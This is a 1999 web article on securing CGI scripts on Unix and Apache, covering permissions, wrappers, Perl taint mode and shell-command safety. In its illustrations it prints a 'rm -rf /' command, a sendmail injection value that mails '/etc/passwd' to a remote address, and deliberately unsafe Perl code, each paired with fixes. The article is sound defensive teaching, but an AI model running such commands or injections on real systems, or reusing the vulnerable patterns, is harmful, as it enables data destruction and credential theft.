Home Articles FAQs XREF Games Software Instant Books BBS About FOLDOC RFCs Feedback Sitemap
irt.Org

Related items

Creating a Page Counter In Perl

Speed Thrills : CGI Please ... and Fast!

CGI Programming Made (Relatively) Easy Using Libraries

Server-Side Includes and its Extensions

Random and Recursive Crypting using Salt on Unix and Win32

Timestamping an HTML Document

Deleting Files in Perl

Creating a mailing list using Perl

Reading and Writing to Files on the Server

Server Side Includes and CGI Security

CGI Security : Better Safe than Sorry

You are here: irt.org | Articles | CGI & Perl | CGI Security : Better Safe than Sorry [ previous next ]

Published on: Sunday 19th September 1999 By: Pankaj Kamthan

Introduction

CGI is the first and remains one of the most widely-used means of extending Web servers by interfacing external applications, offering various advantages.

However, the power of CGI comes with a price. CGI interfaces can completely compromise a Web server's security, and thus of the host on which it is running. All benefits of a CGI script are neutralized if it is insecure. It is impossible to anticipate (and defend) against all security holes. But by following a few guidelines, you can avoid known security holes and unsafe practices.

In dealing with the CGI security issues, our focus will be the following questions:

What type of potential CGI security problems exist? How do they arise? What can be the consequences of these problems? How, and to what extent, can these problems be eliminated?

For the sake of this article, we will restrict ourselves to UNIX-type environments, although many ideas presented here carry over to other systems. When referring to a programming language, we will refer to Perl exclusively as it has established itself as the language of choice for CGI programming. Also, even though the CGI is independent of any server, we will incline our discussion towards Apache, the most popular Web server in use today.

CGI Security Breach : Origins and Consequences

The first step towards tackling the CGI security issues requires finding the origins of the problems. This in turn requires identification of all the different components involved in the entire CGI communication process. (Note that not all of these are involved in all cases.) They are:

  1. The User. A person including an intruder (such as a hacker, masquerader, counterfeiter, an eavesdropper) or a program (such as a virus).
  2. HTML form or searchable index.
  3. HTTP and CGI protocols.
  4. The CGI script.
  5. Compiler/interpreter that runs the CGI script (which depends on the language the script is written in).
  6. External data (that comes from the user in 1. above).
  7. External programs that the script calls.
  8. Client-side techniques, such as JavaScript, used in conjunction with the CGI.
  9. The Web browser.
  10. The Web server.

Figure 1 presents a schematic of the CGI communication between the Web client and server.

Here are some remarks on the effect of the above components. The main sources of CGI security problems are 2, 4, 6, 7 and 10, which result in insecure data, insecure code, or insecure server. 6 can pose a major security problem when it comes in contact with 7. It is possible that 3, 5 or 7 themselves could lead to security problems. Discussion of that is beyond the scope of this article. 8 and 9 are client-side technologies and don't really have a direct relationship with the CGI security issue. 8, however, can affect 6.

This article is primarily targeted towards developers who write CGI scripts; however, we have also provided a section for those who use pre-built CGI scripts for their purposes.

CGI Communication

Figure 1. CGI Communication between the Web Client and Server.

CGI scripts can present security holes in two ways:

  1. They may intentionally or unintentionally leak information about the host system that can result in a break in.
  2. Scripts that process remote user input, such as the contents of a form or a "searchable index" command, may be vulnerable to attacks in which the remote user tricks them into executing commands.

Security holes present in CGI scripts on Web sites can be exploited for various frivolous purposes, including the following:

Server-Side Configuration for CGI Scripts

Server Configuration for CGI Scripts

CGI scripts reside within the Web server-accessible directory. Any lapses in the server configuration can lead to CGI security problems. Therefore, knowing appropriate server configurations can be helpful:

Moral: Fix a single directory, such as cgi-bin, for serving CGI scripts only, and abide by it.

CGI Script Privileges

007 Can not be Trusted

You should make sure that the CGI scripts have only the required permissions  for the task they perform. In UNIX, you can set that by the chmod command. For example, search scripts (and various other which do not let others write to the server) usually run under the mode "755."

"NOBODY" can be a Threat to Everybody

Even if the server is run as "nobody," CGI scripts are potential security holes.  A subverted CGI script running as "nobody" still has enough privileges to mail out the system password file, or even launch a log-in session on a high numbered port. Even if your server runs in a chroot directory, a buggy CGI script can leak sufficient system information to compromise the host.

CGI Scripts with Extra Privileges

There are cases where some scripts need to grant some extra privileges to their users, without giving away other privileges that they didn't intent to give away. These scripts need to run with permissions different from those of the Web server itself (usually user "nobody"). On UNIX, one way to do that is to make the CGI script suid. By doing that, the script runs with the permissions of the owner of the file, rather than the Web server itself and lets a CGI script to access resources that it otherwise could not.

In Perl, it can be done as follows:

Running a script as suid can, however, be dangerous. The need for a script to run as suid should be carefully examined. This represents a major risk insofar as giving your script more privileges than the "nobody" user has. Weaknesses in setuid scripts can let a malicious user access not only files that the low-privilege Web server user can access, but also any that could be accessed by the user the script runs as. (That is why the scripts should be run as the lowest possible privilege.) It also increases the potential for damage that a subverted script can cause. Many UNIX systems contain a hole that allows suid scripts to be subverted. This hole affects only scripts, not compiled programs. On such systems, an attempt to execute a Perl script with the suid bits set will result in an error message from Perl itself. One way to avoid that is to run the server itself as a user that has sufficient privileges to do whatever the scripts need to do.

Moral: Make sure that CGI script permissions are set correctly. Unless absolutely necessary, do not run a script under "suid." Avoid "setuid root." In any case, use a CGI wrapper, if possible.

CGI Wrappers

CGI scripts can be made safer in some situations by placing them inside a CGI "wrapper" script. Wrappers may perform certain security checks on the script, change the ownership of the CGI process, or use the UNIX chroot() mechanism to place the script inside a restricted part of the file system.

There are three major wrappers available for UNIX systems that we discuss here:

CGIWrap

CGIwrap is a gateway program that puts a wrapper around CGI scripts and thus allows general users to use CGI scripts without compromising the security of the Web server. Scripts are run with the permissions (for example, "nobody") of the user who owns the script. In addition, several security checks are performed on the script, which will not be executed if any check fails. A policy can be enforced so that users must use CGIwrap in order to execute CGI scripts. This simplifies administration and prevents users from interfering with each other.

There are certain caveats of deploying CGIWrap. Since CGI scripts run under the server's user ID, it is difficult under these circumstances for administrators to determine, for example, whose script is generating bounced mail, or introducing errors in the server log. There are also security implications when all users' scripts run with the same permissions: one user's script can unintentionally (or intentionally) trash the database maintained by another user's script. CGIWrap also increases the risk to the individual user; a subverted CGI script can trash the user's home directory by executing the command:

/bin/rm -rf /

Since the subverted CGI script has write access to the user's home directory, it could also place a trojan horse in the user's directory.

SBOX

sbox, like CGIWrap, can run CGI scripts as the author's user ID. However, it takes additional steps to prevent CGI scripts from causing damage. It optionally performs a chroot to a restricted directory, isolating the script from the user's home directory. It can also set resource allocation limitations on CGI scripts which prevents certain denial-of-service attacks.

suEXEC

The Apache Web server comes with its own wrapper script called suEXEC. suEXEC provides the same functionality as CGIWrap, but, in addition, you can (using the User and Group directives in the <VirtualHost> section of the configuration file httpd.conf) have scripts run with the permissions of that user and group.

Normally, when a CGI or Server-Side Includes (SSI) script executes, it runs as the same user who is running the Web server. The suEXEC feature provides Apache users with the ability to run CGI (and SSI) scripts under user IDs different from the user ID of the calling Web server. When an HTTP request is made for a CGI (or SSI) script, Apache provides the suEXEC wrapper with the script's name and the user and group IDs under which the program is to execute. The wrapper then performs a series of tests to determine success or failure of the request. If any one of the tests fails, the program logs the failure and exits with an error.

Using suEXEC requires managing setuid root programs and the security issues they present. Used properly, this feature can reduce considerably the security risks involved with allowing users to develop and run private CGI (or SSI) scripts. However, if suEXEC is improperly configured, it can cause any number of problems and possibly create new security holes in your system.

>Moral: CGI wrappers are useful but they are not magic bullets. If you use them, make sure you are aware of their features (and limitations). Specifically, use suEXEC only if you have the requisite background to do so.

The Language of Choice for CGI Scripts : Compiled Vs. Interpreted

CGI scripts are written using a programming language, and the language of choice plays a key role in the security issues around them:

All this being said, there is no guarantee that a compiled program will be safe. Interpreted languages such as Perl contain a number of built-in features (for example, the tainting mechanism) that were designed to catch potential security holes, and may make Perl scripts safer in some respects than the equivalent C program.

Embedded Interpreters in Apache and CGI Scripts

Apache can be extended by embedding language interpreters. For example, mod_perl is an Apache module which embeds the Perl language interpreter into it. This opens up an entire host of new applications which have previously been nonexistent. Often, CGI/Perl scripts tend to suffer from performance problems; with the use of mod_perl, one can have significant performance gain when running such scripts under Apache. These CGI scripts can now also access Apache internals.

Since mod_perl runs within an Apache httpd child process, it runs with the user/group ID specified in the httpd.conf file. Therefore, there are a few security considerations that you should be aware of:

HTML Forms and the Script

Sanity Checks

You should perform sanity checks, such as, all HTML form elements should return values.

Script Invocation

Although you can restrict access to a script to certain IP addresses (using, for example, <Limit>...</Limit> directives in the Apache configuration file access.conf) or to user name/password combinations (using, for example, Basic authentication in Apache), you can not control how the script is invoked. A script can be invoked from any form, anywhere in the world and even by directly requesting its URL. Referer gateways are good examples of such a case. When restricting access to a script, restrictions should be placed on the script as well as any HTML forms that access it. This is obviously the case when the script itself  (dynamically) generates the requisite HTML document (containing the forms). In other cases, you can use the CGI environment variable HTTP_REFERER, which provides the URL of the document that the browser points to before accessing the CGI script, to restrict access.

Hidden Variables

Hidden variables should not be relied upon for security. This is because the hidden variables are in fact visible in the HTML that the server sends to the browser; all a user has to do is view the source of the document. After that, the user can set the hidden variables to his/her desire and send it back to the script. An example of a script using hidden variables (for state persistence) is the shopping cart script in the article E-Store on the Web : Let's Go Shopping!

CGI Scripts Calling External Programs

In Perl, you can invoke external programs in many different ways: you can capture the output of an external program using backtick quotes; you can open up a pipe to a program; you can invoke an external program and wait for it to return with system(); you can invoke an external program (and never return) with exec(). All of these constructions can be risky if they involve user input that may contain shell metacharacters. You should therefore try to find ways not to open a shell. It is safer to call an external program directly than going through a shell. However, this approach, though safe, essentially precludes programs that need to access external programs.

Information (Over)exposure

There are scripts that leak system information. For example, CGI gateways to the UNIX finger command often prints out the physical path to the fingered user's home directory, the w command gives information about what programs local users are using, and the ps command gives out valuable information on daemons running on the system.

Moral: Avoid giving out too much information about your site and server host.

Backtick Quotes

Backtick quotes (`...`), available in Perl (and shell interpreters) for capturing the output of programs as text strings, are dangerous. For example

print `/path_to/finger $input ('user_input')`;

expects the user input to be somebody's username. However, that may not always be the case.

Moral: Avoid backticks in CGI scripts.

Calling Shell Commands eval(), exec(), system()

It is very important that you understand what damage these calls can do. In some cases, you can avoid passing user-supplied variables through the shell by calling external programs differently.

For example, here is a Perl script that tries to send mail to an address indicated in a fill-out form:

$mail_to = &get_input; # read the address from form
open (MAIL,"| /path_to/sendmail $mail_to");
print MAIL "To: $mail_to\nFrom: somebody\n\n Hello\n";
close MAIL;

The problem is in the piped open() call. The script author assumed that the contents of the $mail_to variable will always be just an e-mail address. However, this may not be the case. If the following is entered:

nobody@nowhere;mail somebody@somewhere</etc/passwd;

the open() statement will evaluate the following command:

/path_to/sendmail nobody@nowhere; mail somebody@somewhere</etc/passwd

Unintentionally, open() has mailed the contents of the system password file to the remote user, opening the host to password cracking attack.

This situation can be avoided. sendmail supports a -t flag, which tells it to ignore the address given on the command line and take its To: address from the e-mail header. There is also the -oi flag to prevent sendmail from ending the message prematurely if it encounters a period at the start of a line. The example above can be rewritten in order to take advantage of these features:

$mailto = &get_input; # read the address from form
open (MAIL,"| /path_to/sendmail -t -oi");
print MAIL <<END;
To: $mailto
From: somebody(somebody\@somewhere)
Subject: something
...
END
close MAIL;

In Perl, (by using Perl's implementation of system() and exec() functions) you can  pass arguments directly to external programs rather than going through the shell. For system() and exec(), if you pass the arguments to the external program, not in one long string, but as separate members in a list, then Perl will not go through the shell and shell metacharacters will have no undesired side effects. For example, instead of:

system "/path_to/sort < foo.in";

by doing this:

system "/path_to/sort","foo.in";

This feature can also be used to open a pipe without going through a shell. By calling open on the character sequence |-, you fork a copy of Perl and open a pipe to that copy. The child copy can then "exec" another program using the argument list variant of exec().

my $result =  open (SORT,"|-");
die "Couldn't open pipe to subprocess" unless defined($result);
  exec "/path_to/sort",$user_variable or die "Couldn't exec sort"
    if $result == 0;
  for my $line (@lines) {
    print SORT $line,"\n";
}
close SORT;

The initial call to open() tries to fork a copy of Perl. If the call fails it returns an undefined value and the script immediately dies, else the result will return zero to the child process, and the child's process ID to the parent. The child process checks the result value, and immediately attempts to "exec" the sort program. If anything fails at this point, the child quits. The parent process can then print to the SORT filehandle in the usual manner. To read from a pipe without opening up a shell, you can do something similar with the sequence -|:

$result = open(EGREP,"-|");
die "Couldn't open pipe to subprocess" unless defined($result);
exec "/path_to/egrep",'-efi',$user_pattern,$filename
  or die "Couldn't exec grep" if $result == 0;
  while (<EGREP>) {
  print "match: $_";
}
close EGREP;

Moral: Wherever possible, avoid opening shell. If you do so, check return conditions from all system calls.

Exposing External Data to the Shell

An example of exposing data to shell, which is a potential security threat is:

system ("/path_to/finger $user_input");

The problem is that any shell metacharacters can be passed through it. The list of shell metacharacters is extensive:

&;`'\"|*?~<>^()[]{}$\n\r

In case you have to open a shell, you should always scan the arguments for shell metacharacters and remove them. The best way is to check incoming data for the exact pattern that is desired. The Perl regular expressions that can be used for this purpose are given in the Appendix.

For example, one way to assure that the $mail_to address created by the user really does look like a valid address is:

$mail_to = &get_name_from_input;
unless ($mail_to =~ /^[\w.+-]+\@[\w.+-]+$/) {
  die 'The address is not in form einstein@irt.org';
}

Moral: Never pass unchecked remote user input to a shell command. Match legal characters rather than filtering out disallowed ones (which is much more difficult to guess).

Tainting

One of the most frequent security problems in CGI scripts is inadvertently passing unchecked user-supplied variables or "tainted variables" to the shell. Tainted variables are those that contain data that originate from outside the script, including data read from environment variables, from command line array, or from standard input. Perl provides a "taint checking" mechanism that prevents you from doing this. This feature checks for tainted variables and refuses to pass them to subshells to eval(). In Perl 5, the Perl "taint mode" can be enabled by placing the "-T" option at the beginning of the Perl script:

#!/usr/local/bin/perl -T

(Perl 4 does not support the -T flag. Instead, Perl 4 distributions typically come with a separate executable called taintPerl.)

The tainting mechanism has the following characteristics:

See the CGI/Perl Taint Mode FAQ for more details on the tainting mechanism in CGI/Perl scripts.

Moral: Use Perl's tainting features for all CGI scripts written in Perl.

Path Environment Variable to Resolve Partial Path Names to Locate External Programs

The PATH environment variable can be altered so that it points to the program the user wants your script to execute rather than the program you are expecting. You should invoke the programs using their full absolute pathnames instead. If you must rely on the PATH, set it yourself at the beginning of your CGI script. In general, it is not a good idea to put the current directory (".") into the path.

Moral: When using the PATH environment variable to invoke external programs, use absolute pathnames.

General Considerations

There are some general design considerations that can be followed to avoid CGI security problems:

Pre-Built CGI Scripts : There is no Free Lunch

Software reuse is a popular trend in the programming world: "avoid reinventing the wheel wherever you can." However, this practice comes with a price when programs are used as "black-boxes."

As an example, pre-built CGI scripts may contain security bugs unknown to their users. Therefore, if used at all, pre-built CGI scripts should be used with caution and various questions should be asked (and answered to a satisfactory extent) prior to their use. Here is a checklist:

  1. How complex is the script? The longer is the script, the more likely it is to have problems.
  2. Does the script read and/or write files on the host system? Programs that read files may inadvertently violate access restrictions, or pass sensitive system information to unauthorized users. Programs that write files have the potential to modify documents, or, in the worst case, introduce trojan horses in your system.
  3. Does the script interact with external programs on your system? If yes, does it do so in a safe manner? For example, does the script use explicit path names when invoking these programs (instead of using the PATH environment variable to resolve partial path names)?
  4. Does the script run with suid privileges? This is usually not considered safe.
  5. Does the script validate user input from forms? Undesired user input is one of the primary causes of CGI security breach.

For a detailed account on this issue, see the article Security Issues When Installing and Customizing Pre-Built Web Scripts.

Moral: Use pre-built CGI scripts with caution and perform security checks before using them. If these scripts are in Perl, you should enable the Perl-specific security mechanisms. Visit regularly the sites which distribute them for updates/patches.

Conclusion

CGI Ahead : Script with Caution

Computer security is a give and take situation. There is no perfectly secure system. Thus, security is more about acceptable risk and emergency recovery than impregnability. That being said, all possible CGI security problems (and hence solutions) can not be identified apriori. The practices described here reduce the risk of security breaches but don't eliminate it. Also, even if the script seems safe, there is always the possibility that the external programs it uses may themselves be vulnerable.

Acknowledgements

Many of the examples introduced in the section CGI Scripts Calling External Programs are adapted from the The World Wide Web Security FAQ, and their use is hereby acknowledged.

References

Appendix : A Summary of Perl Regular Expressions

EXPRESSION FUNCTION
/abc/ Matches abc anywhere within the string
/^abc/ Matches abc at the beginning of the string
/abc$/ Matches abc at the end of the string
/a|b/ Matches either a or b
/ab{m,n}c/ Matches an a followed by m-n b's, followed by c, where m,n are nonnegative integers, m>n. If the second number is omitted, such as /ab {m,}c/, the expression will match m or more b's.
/ab*c/ Matches an a followed by zero or more b's, followed by c.
/ab+c/ Matches an a followed by one or more b's followed by c.
/ab?c/ Matches an a followed by an optional b followed by c. In Perl 5, the expression: /ab*?c/matches an a followed by as few b's as possible.
/./ Matches any single character except a newline (\n) /a..d / matches a a followed by any two characters, followed by d.
/[abc]/ Matches any one of a or b or c. A pattern of /[abc]+/ matches strings such as abcab, acbc, abbac, and so on.
/\d/ Matches a digit. Multipliers can be used. (/\d+/ matches one or more digits.)
/\w/ Matches a character classified as a word.
/\s/ Matches a character classified as whitespace.
/\b/ Matches a word boundary or a backspace. /cde\b/ matches cde, but not cdef. However, \b matches a backspace character inside a class. that is, [\b].
/[^abc]/ Matches a character that is not in the class. /[^abc ]+/ will match a string such as defg.
/\D/ Matches a character that is not a digit.
/\W/ Matches a character that is not a word.
/\S/ Matches a character that is not whitespace.
/\B/ Requires that there is no word boundary. /perl\B/ matches perl, but not perl script.
/\*/ Matches the * character. Use the \ character to escape characters that have significance in a regular expression.
/(abc)/ Matches abc anywhere within the string, but the parentheses act as memory, storing abc in the variable $1.
/abc/i Ignores case. Matches either abc, Abc, ABc, and so on.

Related items

Creating a Page Counter In Perl

Speed Thrills : CGI Please ... and Fast!

CGI Programming Made (Relatively) Easy Using Libraries

Server-Side Includes and its Extensions

Random and Recursive Crypting using Salt on Unix and Win32

Timestamping an HTML Document

Deleting Files in Perl

Creating a mailing list using Perl

Reading and Writing to Files on the Server

Server Side Includes and CGI Security

Feedback on 'CGI Security : Better Safe than Sorry'

©2018 Martin Webb